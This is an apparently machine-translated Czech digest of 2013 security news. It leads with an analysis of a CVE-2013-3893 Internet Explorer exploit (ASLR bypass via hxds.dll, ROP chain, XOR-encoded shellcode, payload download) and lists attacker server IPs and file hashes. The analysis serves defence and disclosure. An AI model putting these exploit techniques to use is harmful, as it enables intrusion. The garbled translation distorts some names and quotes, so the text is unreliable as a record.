V září Microsoft publikoval informace o novém Internet Explorer zranitelnosti - CVE-2013-3893. Tato chyba zabezpečení se týká verze IE 6 až 11 pro platformy systému Windows XP přes systém Windows 8.1. Později, v září, společnost vydala opravu zavírání zranitelnost.
Počítačoví zločinci jsou rádi, že takové využití chyby, protože jsou snadno zpeněžit - Internet Explorer je stále populární.
Top 5 prohlížeče podle http://gs.statcounter.com
Tento typ zranitelnosti je velmi nebezpečné, protože umožňuje spuštění libovolného kódu na cílovém systému. Na konci září jsme zjistili, exploit pro zranitelnosti, která využívá útok používání po volném typu proti vykreslování HTML v aplikaci Internet Explorer v motoru mshtml.dll.
Nedávno jsme zjistili, že modifikace zneužití byl použit v cílených útoků proti řadě vysoce postavených organizací v Japonsku.
Cílený útok
Tato chyba je využíván pouze na ty počítače, které jsou součástí konkrétní podsítě sítí cílových organizací:
Definování podsítí, ve kterém bude počítač být napaden
Jestliže je IP adresa počítače patří k jednomu z rozsahů definovaných zločinci, bude možné tuto chybu zabezpečení zneužít poté, co uživatel navštíví infikovanou webovou stránku.
Jsou získány následující informace v první fázi útoku:
Operační systém verze Internet Explorer verze Jazyk používaný OS Ať už je nainstalován Microsoft Office Využít zvolí vhodný ROP řetěz a shell kód na základě údajů získaných v této fázi:
Volba ROP řetězce a shellcode
Stojí za zmínku, že exploit nebude fungovat na těchto systémech Windows 7, které nemají nainstalován Microsoft Office.
Kontrola verzi operačního systému a zda je nainstalován Microsoft Office
To je proto, že dnešní operační systémy obsahují mechanismy, které činí využití zranitelností obtížnější. Jedním z těchto mechanismů je ASLR (Address Space Layout randomizace). Využít používá chytrý trik vyhnout mechanismus: načte modul kompilovaný bez podpory ASLR do kontextu prohlížeče procesu - hxds.dll knihovny.
Kód po provedení, který je načten hxds.dll
Knihovna, která je součástí balíku Microsoft Office nepodporuje ASLR. To je naloženo na známých adresách v paměti,po které útočníci používají technologii ROP označte paměť obsahující shell kódu jako spustitelný soubor.
Následující shell kód je vykonáván po zranitelnost byla úspěšně zneužil:
To může být viděno na obrázku výše, že shell kód dekóduje její hlavní část pomocí 0x9F jako klíč.
Po dešifrování kódu vyhledá funkcí potřebných stáhnout a spustit náklad, najít podle jejich hashe:
Hash použitých funkcí
Po dokončení hledání potřebných adres, zobrazí se následující činnost probíhá:
škodlivý objekt s názvem "runrun.exe" je stažen ze serveru útočníků:
Stahování na náklad
Vzhledem k tomu, stáhnout modul je šifrována, shell kód načte z disku a dešifruje ji pomocí 0x95 jako klíč, po které se spouští dešifrovaný modul:
Dešifrování stažený modul
Distribuce exploitu
Jak již bylo uvedeno výše, cílené útoku použít pouze na jednu změnu zneužití pro CVE-2013 - 3893. Ve stejné době, celkový počet změn objevil dosud činí 21. Útoky využívající tuto chybu většinou byly zjištěny na Tchaj-wanu:
Máme následující informace o serveru, ze kterého exploit je užitečná byly staženy:
Server
Kraj
211.23.103.221
Tchaj-wan
210.177.74.45
Hong-Kong
192.192.91.6
Tchaj-wan
61.63.47.27
Tchaj-wan
Stručná analýza jednoho z užitečného zatížení variantách ( md5 - 1b03e3de1ef3e7135fbf9d5ce7e7ccf6 ) ukázala, že spustitelný modul má šifrovaná data ve svých zdrojích:
Šifrovaných dat obsažených v datovém zdroji je
Spustitelný modul extrahuje data a převádí jej na modulu DLL:
Extrakce šifrovaná data
DLL vytvořené konverzí dat získaných z užitečného zatížení je zapsán na disk pomocí následující cestu: TempPath \ tmp.dll ( md5 - bf891c72e4c29cfbe533756ea5685314 ).
Knihovna exportuje následující funkce:
Funkce vyvážené tmp.dll
Pokud se knihovna byla zapsána na disk, je vložen do adresového prostoru procesu a ishk vyvážené funkce se nazývá:
Volání ishk exportovat funkci
Knihovna sama provádí injekci do jiného adresového prostoru procesu.
Po spuštění malware komunikuje se serverem v Jižní Koreji. Následující požadavky jsou odesílány z infikovaného stroje:
Žádosti odeslané z infikovaného počítače
Kaspersky Lab detekuje užitečné zatížení stažený jako Trojan-Dropper.Win32.Injector.jmli.
Zjistíme exploit jako HEUR: Exploit.Script.Generic.
Října Patch Tuesday Preview (CVE-2013-3893 oprava přichází!)
4.10.2013 Zranitelnosti
Zatím máme pre-oznámení od společnosti Microsoft a Adobe.
Microsoft slibuje, 8 bulletiny, rozdělené rovnoměrně mezi kritické a důležité. Kritické bulletiny u systémů Windows, Internet Explorer a rozhraní. NET Framework, zatímco důležité bulletiny vliv Office a Silverlight.
Tak to zní jako průměr, velmi těžký klient Patch Tuesday. Na konci serveru, jsou ovlivněny pouze Sharepoint Server (opět) a Office Server.
Důležité: Kumulativní aktualizace IE součástí bude obsahovat opravy pro CVE-2013-3893, v současné době ne-záplatované, ale využívány Chyba zabezpečení v aplikaci Internet Explorer. Tento bulletin je třeba použít co nejdříve po uvolnění.
Adobe předem oznámil pouze jednu náplast a Acrobat PDF Reader. Pro podrobnosti
Yahoo přehodnotí systém odměn za nalezené chyby
4.10.2013 Zranitelnosti Společnost Yahoo si vysloužila veřejnou ostudu tím, že za nalezené zranitelnosti ve své síti nabízela
Švýcarská společnost High-Tech Bridge, která nalezla několik závažných (již opravených) chyb, které by mohly útočníkům umožnit i krádež e-mailových účtů, tuto odměnu nazvala špatným vtipem.
Yahoo začne odměny za nalezené chyby vyplácet 31. října. Částka, kterou výzkumníci dostanou, se bude pohybovat mezi 150 až 1 500 dolary a zaplaceno dostanou zpětně i ti, kteří chybu nahlásili od 1. července, napsal na blogu společnosti Ramses Martinez, ředitel bezpečnostního týmu společnosti Yahoo. „Samozřejmě to zahrnuje i šek pro výzkumníky z High-Tech Bridge, kterým se mé tričko nelíbilo,“ napsal.
Společnost High-Tech Bridge v pondělí vydala tiskovou zprávu, ve které uvedla, že za odhalení chyb dostali od Yahoo kupon do obchodu Yahoo v hodnotě 12,50 dolarů. Využít šel k nákupu propisek, hrnků či triček. Společnost ve zprávě uvedla, že další výzkum sítě Yahoo pozastaví a uvedla, že je odměna, kterou Yahoo nabízí „špatný vtip“.
Většina velkých společností jako Google nebo Facebook nabízí za nalezení chyb lukrativní odměny. Google platí až 20 000 dolarů a Facebook odměňuje nálezce zranitelných míst minimální částkou 500 dolarů.
Pro společnosti je levnější vyplácet tyto odměny, než platit výzkumníky, kteří by se hledáním chyb zabývali na plný úvazek. Také tím předcházejí šíření těchto citlivých informací na hackerských fórech, kde by výzkumníci mohli své znalosti také zpeněžit.
Společnost Yahoo nikdy neměla oficiální postup, jak výzkumníky odměnit. Martinez napsal, že trička posílal, aby vyjádřil své díky. „Dokonce jsem je koupil za své peníze,“ uvedl.
Společnost už se rozhodla před nějakým časem svůj program na hlášení chyb vylepšit. Yahoo na objevené zranitelnosti reagoval vždy rychle, ale „nápad posílat trička potřeboval vylepšit,“ napsal Martinez. „Náš bezpečnostní tým dokončuje upravený program celý měsíc,“ napsal. „A včera ráno přišel úder v podobě triček. Můj e-mail byl plný naštvaných zpráv, jak se opovažuji posílat jako vyjádření díků pouhé tričko.“
Yahoo plánuje vylepšit i webové stránky, přes které mohou výzkumníci chyby hlásit. „Budeme výzkumníky kontaktovat během dvou týdnů,“ uvedl Martinez. Ti, kteří úspěšně nahlásí chybu, budou moci získat i referenci v podobě dopisu či e-mailu. „Lidé, kteří odhalí nejzávažnější chyby, se také dostanou do naší síně slávy,“ napsal Martinez.
Je bezdrátové připojení na trojského koně v zabezpečení vaší sítě? 3.10.2013. Bezpečnost | Viry Podle Rogera Klorese z WatchGuard technologie, chytré telefony a tablety nyní tvoří asi 25% zařízení používaných pro práci v USA. Bezdrátový, mobilita a BYOD jsou součástí nezastavitelné vlny, založené na všeobecném spotřebitele a vzdálené pracovník použití. S novým bezdrátovým standardem rychleji, 802.11ac, který má být letos ratifikována, a 4G neustále roste, poptávka po rychlé bezdrátové na pracovišti zvyšuje neúprosně.
Zatímco toto vytváří řadu příležitostí, ale také vytváří velké množství problémů. Pokud například váš existující bezdrátové síti je nejistý, a to na té bázi písku se vždycky nepodaří. Historicky, pro mnoho organizací, velkých i malých, bezdrátové byla taktická řešení zaměřeném na uživatele poptávky po notebooku (a následně smartphone a tablet), mobilita v kanceláři. Protože poptávka a uživatelé se zvýšily organizace typicky přidal více přístupových bodů. Dnes přístupové body jsou významným prvkem uživatele LAN. I když nemusí nést nejvyšší množství dopravy, obvykle bude nést nepřiměřené procento důvěrných obchodních informací. Problém, který má tato, a to zejména pro menší organizace, je to, že přístupové body sedí uvnitř sítě a připojení k němu, jsou často vnímána jako jsou pokryty mnoha existujících řešení pro zabezpečení internetových bran. To může znamenat, že jsou připojeny přímo k důvěryhodné síti (vnitřní LAN). Pokud se to stane, to vyvolává velké bezpečnostní riziko. Navíc existuje riziko, i když bezdrátové připojení je řízena prostřednictvím samostatné virtuální LAN (VLAN). Wireless se připlížil na mnoha organizací. V situaci, kdy byla poskytnuta jako doplňkovou službu pro určité zvláštní zaměstnanců a jako host službu poskytnout přístup k internetu pro návštěvníky (a pracovníci), se postupně na významu. Dnes, s blížící se více Gb 802.11ac bezdrátovým standardem, nyní můžeme předvídat zásadní posun od připojení k bezdrátové síti. Hlavním problémem je to, že posouzení rizik a bezpečnosti rozmístěny po celém bezdrátové nedrží krok s tempem změn. Zatímco mnoho skutečných hrozeb bezdrátové použití se nezměnily, zvyšující se tempo zavádění výrazně zvýšily rizika organizace. Firmy často nejsou vědomi rizik, protože mají vícevrstvé obvodové bezpečnosti v místě a neuvědomují si, že bezdrátový přístup je ničena, že bezpečnost. Kromě toho chybně "mělčina mentalitou ještě žaluzie uživatelům rizika. Uvědomují si, existuje spousta hackerů tam, ale prostě si myslím, že tam je tak mnoho cílů, je nepravděpodobné, že bude ten, kdo je napaden. Potenciální rizika: misconfiguration - Pokaždé, když se nový přístupový bod, který zní, existuje riziko, že může být špatně nastaven. Pokud se tak stane, budou pravidla, která byla zavedena k ochraně sítě nesmí být důsledně uplatňována. Muž ve středním útoku - Tento typ útoku je místo, kde někdo představuje SSID (Network Address), která předstírá, že je něco, co to není " t, např. vaší firmy bezdrátové jméno. Útočníci zachytit jména a hesla uživatelů, kteří se přihlásili, a předávat je prostřednictvím, takže není zřejmé, co mají udělat. Mimochodem, to je riziko, že každý, kdo se přihlásí na internetové kavárny, hotelové haly, atd. trvá. Připojení neoprávněných uživatelů - Nepovolené uživatelé mohou připojit k síti. To může být nespokojený ex-zaměstnanci, může být prostřednictvím krádeže identity nebo prostřednictvím "man-in-the-middle attack". Většina organizací jsou zranitelní, protože většina organizací má něco cenného v síti, jako jsou údaje o kreditní kartě, online bankovní informace, důvěrné detaily ze mzdy, nebo informace užitečné ke konkurenci. Vložení škodlivého kódu nebo odcizení kódu prostřednictvím bezdrátového připojení - připojení přímo do důvěryhodné sítě vytváří zranitelnost dat pro programy krást, stejně jako programy zničení dat -. zejména nespokojených jedinců a ex zaměstnanci krádež dat aplikací na mobilních zařízeních - Zatímco Apple není imunní, problém je zvláště škodlivých aplikací zhoubné na zařízení se systémem Android. Rogue přístupové body - Dobře míněné zaměstnanci (a někdy méně dobře míněný) můžete dát další přístupové body bezdrátové sítě poskytovat větší pokrytí, bez svolení či vědomí managementu, vytvářet bezpečnostní rizika. TKMaxx podvod - je na který se nezapomíná TKMaxx podvody s kreditními kartami, kdy hackeři přístup k údajům o 45 milionů platebních karet, a to prostřednictvím nezabezpečené bezdrátové sítě LAN. Pomocí bezdrátové a mobilita stává stále všudypřítomné, nyní je ten správný čas na přezkoumání rizik, bezpečnostní politiky a ochrany, které jsou v místo. Většina společností má politiku pro bezdrátové a mobilitu, které jsou out-of-date. Vzhledem k tomu, že je výrok a řízení politik, které pohání chování zaměstnanců, out-of-datle a bez dozoru politiky bude téměř jistě povede k nesprávnému chování zaměstnanců, pokud jde o mobilní bezpečnosti. Revize politiky, snad tím, že některé náročné uživatele, kteří pochopit, co se děje s technologií a aplikací, a to nejen dává jasnou zprávu o činnosti, že jste vážně o mobilní bezpečnosti, ale může být často velmi zajímavý a poučný zážitek. Je také důležité, aby uživatelé byli vědomi toho, že zabezpečení bezdrátové sítě je nejen nezbytná, ale také být řízeny a vykazovány. Bezdrátové změny rizikového profilu zvyšuje využití a více uživatelů jsou povoleny. Mnoho hrozeb, se změnily a stěhovali se z podniků do menších podniků. Nicméně, mnoho organizací nebyly přezkoumány své bezdrátové mobility a rizika v souladu s rostoucí bezdrátové použití. Oni jsou často vyvalit širší přístup a přístupové body bez ohledu na důsledky pro zabezpečení. Pro ty, kteří s PCI nebo bezpečnostních dat a úvah, bezpečnost recenze je zásadní. Vše začíná přezkumu politik a rozpoznávat některá rizika. Na praktické úrovni, tam jsou některé rychlé zisky:
Používat svůj notebook, tablet nebo telefon k vyhledání síťových připojení a ujistěte se, že všechny síťové adresy pod jméno vaší společnosti jsou tvoje. Jako další bezpečnostní zvážit změnu SSID (Network ID) na něco jiného než název vaší společnosti. Ujistěte se, že jsou všechny přípojky přes zabezpečené VPN Ujistěte se, že všechna připojená zařízení mají alespoň antivirovou bezpečnost, včetně všech tablety a smartphony. Použijte dvoufaktorovou autentizaci na ochranu proti krádežím identity. Jako absolutní minimum, vyžadovat, aby všichni uživatelé mají kód PIN pro jejich zařízení.
EU by mohla počítačové bezpečnosti direktivu nákladů firmy miliardy? 3.10.2013. Bezpečnost Mnoho z největších světových podniků nejsou připraveny pro vypracování nové směrnice pro evropskou o kybernetické bezpečnosti, která stanoví, že organizace, které nemají odpovídající zabezpečení IT na místě chránit jejich digitální aktiva bude čelit velmi těžké fiskální sankce. Směrnice, která byla přijata v červenci letošního roku, se bude požadovat, aby organizace cirkulovat včasná varování před kybernetickými rizik a mimořádných událostí, a že skutečné bezpečnostní incidenty jsou hlášeny kybernetických bezpečnostních orgánů. Organizace, které trpí porušení, protože nemají dostatečné zabezpečení IT na místě chránit jejich digitální aktiva čelit pokuty ve výši až dvou procent jejich ročního celosvětového obratu. Nicméně, Ponemon Institute a Tripwire studie, která se zabývala řízení bezpečnosti IT 1320 bezpečnostní odborníci pracující v oblasti zdravotní péče a léčiv, finančních služeb, veřejný sektor, maloobchod, průmysl, služby, technologie, software a komunikace a vzdělávání a výzkumu, bylo zjištěno, že většina organizací jsou pod připraveni na směrnice, a proto hrozí, že bude pokutován miliony liber. celkové závěry z průzkumu byly:
28 procent organizací nemají formální strategii řízení rizik důsledně uplatňována v celém podniku Pouze 5 procent má vyzrálou riziko zabezpečení založené na řízení programu Pouze 51 procent posouzení rizik Pouze 58 procent posouzení zranitelnosti Pouze 58 procent identifikovat hrozby. Dwayne Melancon, ředitel společnosti Tripwire, řekl: "Nová směrnice EU má potenciál mají obrovský celosvětový dopad, protože se vztahuje na všechny organizace, které působí v EU, i když se sídlem jinde ve světě byly členské státy dva. let, jak dát směrnici EU na místě a organizacemi by se měly používat tentokrát s cílem zpřísnit své bezpečnostní programy, aby případ detekce a reakce procesy jsou na místě a účinná, a ztvrdnout jejich systémů, aplikací a sítí, aby se snížilo riziko narušení. " Další zjištění bylo zjištěno, že:
Pouze 13 procent organizací na pravidelné setkání s vedoucími pracovníky, aby diskutovali o stavu bezpečnostních rizik s vedením 25 procent nekomunikují bezpečnostní rizika pro vedoucí pracovníky 37 procent pouze sdělit bezpečnostní rizika pro vedoucí pracovníky, když závažný bezpečnostní incidentu 49 procent si myslí, že nejsou efektivní při komunikaci fakta o stavu bezpečnosti na vedoucích pracovníků. "Velikost pokut spojených s touto směrnicí jsou tak velké, že bude určitě získat pozornost ředitelů a desky," pokračoval Melancon "Je povinností vedoucích obchodních manažerů cílem nalézt jednoznačné odpovědi o bezpečnostních rizicích z vedení informační bezpečnosti s cílem zajistit vhodné kroky k tomu, aby soulad s touto směrnicí před tím, než vstoupí v platnost. " "Tato směrnice je vynikající připomínkou toho, že přijetí uznávaný sadu bezpečnostních kontrol může výrazně zrychlit implementaci spolehlivé bezpečnostní strategie," řekl Melancon "organizace, které chtějí zlepšit bezpečnostní postupy mohou také přístup k množství praktických informací prostřednictvím vzájemného skupin, jako jsou odvětvově specifických ISACs (Sdílení informací a analýza centra), kde mohou sdílet metod a postupů s cílem zlepšit jejich šance na dosažení silné výsledky pro kybernetické bezpečnosti. "
Spojení mezi osobnostními typy a typy phishing 3.10.2013. Phishing | Bezpečnost | Kriminalita Phishing jsou jedny z nejúčinnějších on-line švindle, hákování jak důvtipný a naivní uživatele počítačů. Nové poznatky z výzkumných pracovníků na Polytechnic Institute of New York University (NYU-Poly) bodu ke dvěma faktorům, které mohou zvýšit pravděpodobnost, že uživatel počítače bude propadat: být žena a má neurotické osobnosti. V předběžné studii výzkumníci ochutnal 100 studentů z bakalářského psychologie třídy, z nichž většina byli vědy a technické obory. Účastníci vyplnili dotazník o jejich on-line návyky a přesvědčení, včetně podrobností o druhu a objemu informací, které Sdílet na Facebooku. Byli také požádáni hodnotit pravděpodobnost negativních věcí, které se s nimi děje osobně on-line, jako mají internetové heslo ukradl. Nakonec účastníci odpověděl na zkrácený široce používané multidimenzionální osobnosti průzkumu posouzení. Krátce poté, výzkumníci používají e-mail poskytnuté účastníky provést reálný podvod typu phishing, se snaží lákat studenty klikněte na odkaz do slosování cenu a vyplnit vstupní formulář obsahující osobní údaje. Stejně jako mnoho phishingových podvodů, "z" pole v e-mailu neodpovídá aktuální adresu a e-mail obsahoval pravopisných a gramatických chyb. "Byli jsme překvapeni, že 17 procent našich cílů bylo úspěšně phishingu a to byla skupina se značným počítačové znalosti, "řekl Lewis. Většina z těch, kteří padli za podvod byly ženy, a ty ženy, které byly klasifikovány jako "neurotické" v závislosti na osobnosti posouzení bylo nejpravděpodobnější padat na podvod typu phishing. Neurotické osobnosti jsou charakterizovány iracionální myšlenky a tendence k negativní pocity, jako je pocit viny, smutek, hněv a strach. Nebyla nalezena žádná korelace mezi osobnostními pánských typů a jejich zranitelnosti k phishingu. "Tyto výsledky nám říkají, že osobnostní charakteristiky mohou mít značný vliv, pokud jde o rozhodnutí o online chování, a že může dokonce potlačit povědomí o on-line hrozbami, "vysvětluje Lewis. Tým našel žádnou korelaci mezi úrovní účastníků znalosti počítačové bezpečnosti a jejich pravděpodobnost, že budou phishingu. Vědci také zkoumali spojení mezi množstvím osobních informací účastníků přijatých ke sdílení na Facebooku a osobnostních rysů. Ti kategorizovány jako s "Otevřít" osobnosti tendenci sdílet nejvíce informací na Facebooku a mít nejméně omezující nastavení soukromí na sociální síti, čímž se zvyšuje jejich zranitelnost vůči soukromí netěsnosti. "Ve chvíli, kdy se zdá, že uživatelé počítačů mohou být více zaměřena na možnost získání ceny nebo vnímané přínosy sdílení informací na Facebooku, a že tyto zisky odvádět pozornost od potenciálně škodlivých výsledků, "řekl Lewis. Výzkumníci také zjistili inverzní vztah mezi ty s "otevřeností" a "extroverze "jako osobnostní rysy a pravděpodobnost jejich dalšího phishingu nebo šíření velkým množstvím informací na Facebooku. Mezi studované kohorty bylo 12 lidí bez účtů na Facebooku. Všichni byli muži, nikdo podlehla phishing režimu, a všichni byli nejméně pravděpodobné, že být charakterizována jako "otevřený" nebo "extrovert." Zatímco vědci zdůraznili, že jejich studium vzorek byl malý a je třeba blíže prozkoumat, se domnívají, že poznatky do jak osobnostní rysy dopad rozhodování internetu může pomoci při navrhování efektivnějších počítačových rozhraní, stejně jako bezpečnostní školení a vzdělávání. Vzhledem k tomu, experiment testován jediný typ podvod-prize-phishing budoucí práci může zkoumat, zda jiné typy osobnosti prokázat citlivé na různé typy podvodů.
AlgoSec aktualizace Sada pro bezpečnostní management 3.10.2013. Bezpečnost Nová verze AlgoSec Security Management Suite řeší problémy konsolidace a migrace datových center - programy a aplikace, které podporují - na soukromé, veřejné nebo hybridní mraky prostřednictvím zjednodušených, automatizované změny pracovních postupů a schopnost snadno odhalit pravidla, objektů a integrované které podporují specifické podnikové aplikace. Kromě poskytování obchodní analýzu dopadů změny sítě a poskytuje funkce pro zajištění připojení aplikace je udržován v datovém centru nebo serverové migrace, nová verze obsahuje také out-of-the-box zprávy výchozí konfigurace pro všechny z předních firewallů a routerů, a rozšířené možnosti pro poskytovatele řízených bezpečnostních služeb (MSSPs). AlgoSec Security Management Suite umožňuje organizacím řídit bezpečnost na rychlost změn v podnikání tím, že poskytuje automatizovaný a aplikačně orientované řešení pro správu komplexních politik napříč firewally, směrovače, přepínače a zabezpečené webové brány. Suite propojuje tradiční mezery mezi zabezpečení sítí a aplikací týmů tím, že kombinuje AlgoSec BusinessFlow, Firefow a Firewall Analyzer zefektivnit bezpečnostní operace a řízení změn, zajistit trvalý soulad, maximalizovat dostupnost aplikací a poskytování služeb, a poskytují přísnější bezpečnostní politiku, který nabízí lepší ochranu proti kybernetickým útokům. "Zatímco více organizací se pohybují fyzických datových center a podnikových aplikací na soukromé a hybridní mraky, přechod bezpečnostní politika může být velmi složité, časově náročné a nákladné," řekl Avishai Wool , technický ředitel, AlgoSec. "Prostřednictvím automatické a aplikace-centric přístupu AlgoSec Security Management Suite pomáhá organizacím urychlit migraci a zajištění dostupnosti kritických aplikací při zachování bezpečné a optimalizované síťové bezpečnostní politiky." Mezi nové funkce patří: Obchodní analýza dopadů změny sítě - AlgoSec Suite poskytuje vhled do podnikových aplikací a podkladové připojení toky, které mohou být ovlivněny změnami pravidel brány firewall a plánovaného nebo neočekávané výpadky serveru a tiskovému zařízení. To je rozhodující pro pochopení dopadu na klíčových aplikací při provádění datových center, migrace a vyřazení serveru. Discovery závislých IP adres po celé bezpečnostní politiky - AlgoSec Suite zjednodušuje zjišťování IP adres během migrace tím, že jediné hledání přes více podmínky pro IP adresami obsaženými v objektech a pravidel. Zpráva, která obsahuje zjištěné politik, vhodné pravidel v rámci jednotlivých politik a kde IP nebo objektu bydlí pomáhá zajistit bezpečnostní politika je správně migrovat spolu s síťových komponent. Uzavřená smyčka pro aplikace související změn pravidel - majitelé obchodní aplikace můžete nyní průběžně sledovat stav celého procesu změny týkající se jejich požadavkům aplikace připojení. Out-of-the-box výchozí konfigurační zprávy compliance - Nový, out-of-the-box zprávy výchozí konfigurace odstranění zařízení, konfigurací často využívány kybernetických útoků. Kromě podpory pro Check Point, Cisco IOS směrovačů a firewallů, jsou zprávy o výchozí konfigurace nyní automaticky generovány pro McAfee, Fortinet, Palo Alto Networks a Juniper firewallů, stejně jako Cisco Nexus přepínačů a směrovačů a filtry Bluecoat webu. Rozšířená podpora MSSP - MSSPs mají nyní ještě větší flexibilitu prostřednictvím Web Services API, které integruje Apartmá s externími aplikacemi, provést analýzu zařízení, spravovat zařízení a skupiny, správu uživatelů, vytvářet domény, stejně jako zlepšit licenční provisioning.
Za jihokorejských vládních útoků DDoS
3.10.2013 Počítačový útok | Hacking BERLIN -V posledních několika letech došlo k sérii DDoS útoky a průniky z vládních sítí v Jižní Koreji, které vedly ke ztrátě nesčetné množství dat. Čtyři útoky nebyly propojeny nebo připsat na stejné útočníky, ale tam jsou některé podobnosti v metodách a výsledcích, výzkumník řekl.
Útočníci na jihokorejských vládních míst a banky sahají alespoň červenci 2009 a vyběhnout po incidentu v červnu tohoto roku. Ne všichni z nich byli destruktivní, ale někteří zaměstnán malware, která zničila hlavní spouštěcí záznam infikovaných počítačů a způsobilo, že nepoužitelný. Jiní byli masivní DDoS útoky namířené proti DNS serverů nebo jednotlivých stránek.
V jednom z útoků v březnu 2011 byl škodlivý kapátko stáhnout do zařízení pomocí drive-by download. To kapátko měl časovanou bombu uvnitř ní, která jí dala pokyn zkontrolovat datum a čas a za předem stanovenou hodinu, stáhne a spustí kus malware. Tento aspekt by pak přepsat MBR infikovaný počítač. Existují dva různé vzorky stěračů malware zapojené do útoku, říká Christy Chung ze společnosti Fortinet, jeden pro počítačích se systémem Windows a další pro Unixových strojích. V obou případech byl vymazán MBR, čímž stroje nepoužitelný.
"Ti dva stěrače mají podobné chování," Chung řekl během rozhovoru na konferenci Virus Bulletin 2013 tady ve čtvrtek. "Po restartování zařízení, znamená to, že operační systém nelze najít, protože MBR byl přepsán."
Útoky, které se objevily na 25. června, 2013, používat jinou taktiku, zaměřují dva jmenné servery používané některými z hlavních jihokorejských vládní webové stránky. V tomto případě, malware, který infikoval počítače používají k útoku na jmenné servery přidané komponenty, které měl klíče registru a vytvořené služby, které umožnily, aby malware přežít restart počítače a zůstanou v systému, Chung řekl. Obě cílové DNS servery byly pevně do malwaru a na předem stanovenou dobu malware zahájila DDoS útok na servery. Účinek jako zničující.
"Mnoho z hlavních korejských vládních místech byly k dispozici na nějakou dobu," řekl Čang.
Ačkoli tam byly některé podobnosti v malware používané v útocích, Chung řekl, že je přesvědčen, že stejné útočníci byli za všechny z nich.
"Nechápu to," řekla.
Alexander Potvrzuje 2010 NSA Mobilní Místo pilotní program
3.10.2013 Bezpečnost | Mobil Mezi důvody pro ukončení vypnutí vlády, který má směrem nahoru o 70 procent zpravodajské komunity furloughed až do odvolání, ředitel NSA generálporučík Keith Alexander a ředitel Národní zpravodajské James Clapper strávil značné množství času, kdy Senátní výbor ve středu obrany NSA dohledové činnosti a odsuzuje nedávné zprávy, že agentura je stavební dokumentace na Američany na základě jejich sociálních sítí aktivit.
Alexander také potvrdil, že NSA realizován pilotní program před třemi lety sbírat mobilní telefon umístění dat o telefonních hovorech, ale zdůraznil, program byl od té doby opustil.
"Může to být něco, co může být v budoucnu požadavek na zemi, ale ne teď, protože když jsme se identifikovat celou řadu, dostaneme, že pro FBI a oni mohou dostat pravděpodobnou příčinu, aby se data o poloze, že je třeba, "řekl Alexander. "A to je důvod, proč jsme se zastavili v roce 2011."
Alexander zahájen jeho poznámky s připraveným prohlášením, přičemž zdůraznila, že data nebyla nikdy použita: "V letech 2010 a 2011 získala NSA vzorků za účelem testování schopnosti svých systémů pro zpracování dat, formát, ale že data nebyla použita k jiným účelům a nikdy nebyl k dispozici pro účely zpravodajské analýzy. "
Předmětem lokalizačních údajů byla vznesena minulý týden senátor Ron Wyden, D-Oregon, během slyšení senátního zpravodajského výboru , ale Alexander neposkytovala přímou odpověď, naznačovat, že toto místo bylo utajované informace.
Alexander přísně popíral New York Times zprávu z víkendu, že NSA je vytvářet grafické spojení mezi jednotlivci na základě jejich sociálních médií činností na sítích jako je Facebook. Zpráva byla sestavena na základě dalších dokumentů poskytnutých médiím bývalý dodavatel NSA Edward Snowdena. The Times řekl, leden 2011 poznámky z NSA získala agentura pravomoc provádět "ve velkém měřítku graf analýzu velkých souborů metadat komunikace, aniž byste museli foreignness" dat, který zahrnoval e-mailové adresy a telefonního hovoru metadata.
"Tyto zprávy jsou nepřesné a nesprávné," řekl Alexander. "To, co vzali, je fakt, že jsme se vzít (sociální) data obohatit. Co není v přední části těchto výkazů je slovo "cizí". Informace pochopit, co zahraniční nexus je problémové sady díváme.
"Jsou prostě špatný říkat jsme vytvořili dokumentace na Američany," Alexander dodal dále říká, že v rámci Executive objednat 12333, NSA je schopen řetěz spolu telefonní a e-mailové záznamy zjistit, sociální sítě činnost v zahraničí, pravomoci podepsal na ministrem obrany a generální prokurátor. Alexander také řekl, že v případě, že inteligence shromážděné v průběhu šetření ukázal Američan by se, že data budou předáni FBI, která by sledovala vedení po získání soudního příkazu.
Do té doby, srdce zvonu, 50-letý veterán zpravodajské komunity, odsoudil vládní vypnutí.
"Na vrcholu zabavení škrtů vypnutí vážně poškozuje naše schopnost chránit bezpečnost a zabezpečení tohoto státu a jeho občanů," řekl Klapka. "To není jen otázka obchvatu, ale to ovlivňuje naše globální schopnost podporovat vojenské, diplomatů a politiků."
Klapka dodal, že američtí agenti v současné době na dovolené bude atraktivní cíle pro nábor od protivníků, volat to "snů".
"Z mého pohledu, bude škoda bude horší, vypnutí vleče," řekl Klapka.
Pen Testování Použití živého malware stává nutností
3.10.2013 Bezpečnost | Viry BERLIN -Penetrační testování má za sebou dlouhou cestu za posledních deset let, odvíjející se od poněkud kontroverzní praxi de facto osvědčených postupů v podniku na trhu. Že vývoj se nezastavil v žádném případě, a jedna z věcí, které odborníci říkají, že musí být v žádném komplexní test nyní je používání živých, vlastní malware.
Pen testery často používají vlastní nástroje, které jejich společnosti nebo-postavil, ale použití živých malware není nutně tak časté, jak by mělo být, řekl Gunter Ollmann, technický ředitel společnosti Active IO v rozhovoru na konferenci Virus Bulletin 2013 tady čtvrtek. Myšlenka použití čerstvě vyrobené malware je lépe reprodukovat efekt skutečného útočníka zamířil na cílové síti. Pen testování v mnoha ohledech je o hraní role škodlivého činitele, ale testy mohou být omezeny ve svém rozsahu, a proto méně účinné, pokud nástroje, jako jsou živé malware nejsou použity, Ollmann řekl.
"Malware představuje naprosté většiny porušení. Potřebujeme pera testovací metodiky kopírovat stávající profily útočník, "řekl. "Musíme zjistit, které vrstvy jsou vlastně detekci malware. Věděli malware ohrozit hostitele? Je to použitelné? "
Ačkoli tam jsou miliony a miliony vzorků malwaru jsou k dispozici v databázích v těchto dnech, Ollmann řekl, že to omezené použití v reálném světě penetrační test. Vytvoření nový, jedinečný malware a házet, že v síti zákazníka je mnohem efektivnější a realističtější způsob, jak otestovat síťové obrany.
"Nestojí to házení včerejší malware na cíl," řekl Ollmann. "Off-the-shelf malware je triviální odhalit."
Nicméně, to není záležitost prostě psaní kousek malware a vidět, zda je možné ji proklouznout zákazníka bezpečnostních systémů. Ollmann řekl, existuje celá řada důležitých faktorů, aby zvážila v tomto procesu, včetně toho, zda cílová síť používá proxy, jak zvládnout řídicích a zda chcete vytvořit více verzí daného typu malware.
"Řekl bych, že byste měli vytvořit strom nového škodlivého kódu. Určitě byste měli předem vyzkoušet, ale pouze proti audiovizuálních nástrojů, které můžete zabránit nahráním cloud služeb, "řekl. "Vytvoření značky pro každou konkrétní pracovní místo, a vyberte si C & C opatrně. Většina podniků zaměstnávat proxy, takže je pravděpodobné, že potřebujete, aby vaše malware proxy vědomi dostat přes ty obranu. "
